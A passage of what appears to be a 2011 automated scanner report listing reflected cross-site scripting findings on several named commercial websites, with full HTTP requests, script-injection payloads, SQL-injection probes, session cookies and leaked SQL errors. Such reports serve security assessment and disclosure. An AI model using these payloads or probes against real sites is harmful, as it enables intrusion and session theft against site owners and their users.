itemID = 0
itemID = 0
itemType = ErrorPage
itemType = ErrorPage
status = 404
status = 404
55d6e--&gt;&l
...[SNIP]...

5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7f0d7--><script>alert(1)</script>33d952b95eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 65Wsr6wSrSgAAETmf2MAAAAj
SCRIPT_URL: /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account7f0d7-->
...[SNIP]...

5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 66835--><script>alert(1)</script>be9690c84fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7JbBaKwSrSgAAEYNO4EAAAAC
SCRIPT_URL: /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account/login66835-->
...[SNIP]...

5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 36360--><script>alert(1)</script>6c3f9b7fbac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7addkawSrSgAAETmf2gAAAAj
SCRIPT_URL: /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account36360-->
...[SNIP]...

5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 938be--><script>alert(1)</script>8fe3bc39588 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
4_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7tFtL6wSrSgAAEYWPr8AAAAU
SCRIPT_URL: /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account/orderhistory938be-->
...[SNIP]...

5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E request parameter is copied into an HTML comment. The payload 22046--><script>alert(1)</script>0a045e66a8a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:24 GMT
Server: Apache
ETag: "AAAAS7ub5Kb"
Last-Modified: Fri, 25 Mar 2011 19:13:32 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
%3Ealert%280x000045%29%3C%2Fscript%3E22046--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0a045e66a8a=&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a
Session ID: a-e7l_ipIG-e (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemType = ErrorPage
itemType = ErrorPage
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt
...[SNIP]...

5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 60a71--><script>alert(1)</script>23be3cee852 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:03 GMT
Server: Apache
ETag: "AAAAS7ucEGn"
Last-Modified: Fri, 25 Mar 2011 19:14:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38646


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...

JVM: tta06
Request: GET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=1&itemType=ErrorPage&path=1%2C2%2C195%2C241&itemType=ErrorPage&itemID=1&itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemID = -1 OR 17-7=1060a71--&gt;&lt;script&gt;alert&#x28;1&#x29;&lt;/script
...[SNIP]...

5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload de539--><script>alert(1)</script>eea1fdeeba0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:55 GMT
Server: Apache
ETag: "AAAAS7ucPZy"
Last-Modified: Fri, 25 Mar 2011 19:15:03 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38669


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
pt%3E=&itemID=1&de539--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea1fdeeba0=1&itemType=ErrorPage&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;alert&#x28;0x000045&#x29;&lt;/script&
...[SNIP]...

5.121. https://www.territoryahead.com/jump.jsp [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the path request parameter is copied into an HTML comment. The payload 39c78--><script>alert(1)</script>ebbf84990a5 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 39875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
age&ruleID=18&itemID=-1+OR+17-7%3D10&path=1%2C2%2C195%2C24139c78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eebbf84990a5&itemType=CATEGORY&itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
ruleID = 18
ruleID = 18
itemID = 0
itemID = 0
itemID = -1 OR 17-7=10
itemID = -1 OR 17-7=10
itemType = Er
...[SNIP]...

5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Issue detail

The value of the langid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb17"><script>alert(1)</script>fb63dd7b86f was submitted in the langid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactus/contact-us.asp?langid=en3bb17"><script>alert(1)</script>fb63dd7b86f&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10820
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=JCAOOEFBMFHPBEJFEIFCGJCJ; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<input type="hidden" name="iLanguage" value="en3bb17"><script>alert(1)</script>fb63dd7b86f"/>
...[SNIP]...

5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e04df<script>alert(1)</script>f493791083e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Referer: http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:52 GMT
Expires: Thu, 31 Mar 2011 00:53:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACSCDSTQ=MIGLCKNBKFIFPCAGJMEPDNMN; path=/
X-Powered-By: ASP.NET
Content-Length: 969
Connection: keep-alive

<br>Error Description:No value given for one or more required parameters.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeA
...[SNIP]...
@syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '497205542', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.
...[SNIP]...

5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 874e8<script>alert(1)</script>5752105b959 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:41 GMT
Expires: Thu, 31 Mar 2011 00:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSAACDBD=IKLLEPEBBEOKMFMAJDBGEMOO; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152,
...[SNIP]...
@operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959', @segment = 'undefined'<br>
...[SNIP]...

5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda83"-alert(1)-"46677506f9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:42:16 GMT
